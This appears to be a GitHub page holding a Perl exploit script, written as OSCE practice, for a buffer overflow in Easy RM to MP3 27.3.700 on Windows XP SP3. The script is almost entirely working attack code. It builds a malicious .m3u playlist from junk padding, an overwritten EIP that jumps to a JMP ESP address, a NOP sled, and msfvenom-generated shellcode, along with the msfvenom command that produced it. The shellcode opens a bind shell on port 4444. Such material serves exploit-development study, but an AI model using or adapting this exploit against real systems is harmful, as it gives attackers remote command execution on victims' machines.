-
Notifications
You must be signed in to change notification settings - Fork 0
/
EasyRM_Bind_4444.pl
52 lines (45 loc) · 2.12 KB
/
EasyRM_Bind_4444.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#
# Exploit for Easy RM to MP3 27.3.700 vulnerability, discovered by Crazy_Hacker
# Written by BaffledJimmy as part of OSCE Prep
# https://www.tommacdonald.co.uk
#
# Tested on Windows XP SP3 (English) 32bit
#
#
#
my $file= "BindPOC.m3u";
my $junk= "A" x 26104;
my $eip = pack('V',0x01aaf23a); #JMP ESP from codec2
my $shellcode = "\x90" x 25;
# 144 bytes
# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh -e x86/shikata_ga_nai --smallest -f perl -b '\x00\x0a'
$shellcode = $shellcode . "\xbe\xb9\xe4\xe7\xbb\xdb\xc3\xd9\x74\x24\xf4\x5a\x29\xc9" .
"\xb1\x53\x83\xea\xfc\x31\x72\x0e\x03\xcb\xea\x05\x4e\xd7" .
"\x1b\x4b\xb1\x27\xdc\x2c\x3b\xc2\xed\x6c\x5f\x87\x5e\x5d" .
"\x2b\xc5\x52\x16\x79\xfd\xe1\x5a\x56\xf2\x42\xd0\x80\x3d" .
"\x52\x49\xf0\x5c\xd0\x90\x25\xbe\xe9\x5a\x38\xbf\x2e\x86" .
"\xb1\xed\xe7\xcc\x64\x01\x83\x99\xb4\xaa\xdf\x0c\xbd\x4f" .
"\x97\x2f\xec\xde\xa3\x69\x2e\xe1\x60\x02\x67\xf9\x65\x2f" .
"\x31\x72\x5d\xdb\xc0\x52\xaf\x24\x6e\x9b\x1f\xd7\x6e\xdc" .
"\x98\x08\x05\x14\xdb\xb5\x1e\xe3\xa1\x61\xaa\xf7\x02\xe1" .
"\x0c\xd3\xb3\x26\xca\x90\xb8\x83\x98\xfe\xdc\x12\x4c\x75" .
"\xd8\x9f\x73\x59\x68\xdb\x57\x7d\x30\xbf\xf6\x24\x9c\x6e" .
"\x06\x36\x7f\xce\xa2\x3d\x92\x1b\xdf\x1c\xfb\xe8\xd2\x9e" .
"\xfb\x66\x64\xed\xc9\x29\xde\x79\x62\xa1\xf8\x7e\x85\x98" .
"\xbd\x10\x78\x23\xbe\x39\xbf\x77\xee\x51\x16\xf8\x65\xa1" .
"\x97\x2d\x13\xa9\x3e\x9e\x06\x54\x80\x4e\x87\xf6\x69\x85" .
"\x08\x29\x89\xa6\xc2\x42\x22\x5b\xed\x7d\xef\xd2\x0b\x17" .
"\x1f\xb3\x84\x8f\xdd\xe0\x1c\x28\x1d\xc3\x34\xde\x56\x05" .
"\x82\xe1\x66\x03\xa4\x75\xed\x40\x70\x64\xf2\x4c\xd0\xf1" .
"\x65\x1a\xb1\xb0\x14\x1b\x98\x22\xb4\x8e\x47\xb2\xb3\xb2" .
"\xdf\xe5\x94\x05\x16\x63\x09\x3f\x80\x91\xd0\xd9\xeb\x11" .
"\x0f\x1a\xf5\x98\xc2\x26\xd1\x8a\x1a\xa6\x5d\xfe\xf2\xf1" .
"\x0b\xa8\xb4\xab\xfd\x02\x6f\x07\x54\xc2\xf6\x6b\x67\x94" .
"\xf6\xa1\x11\x78\x46\x1c\x64\x87\x67\xc8\x60\xf0\x95\x68" .
"\x8e\x2b\x1e\x96\x7e\xe1\x8b\x0f\xd9\x90\xf1\x4d\xda\x4f" .
"\x35\x68\x59\x65\xc6\x8f\x41\x0c\xc3\xd4\xc5\xfd\xb9\x45" .
"\xa0\x01\x6d\x65\xe1";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";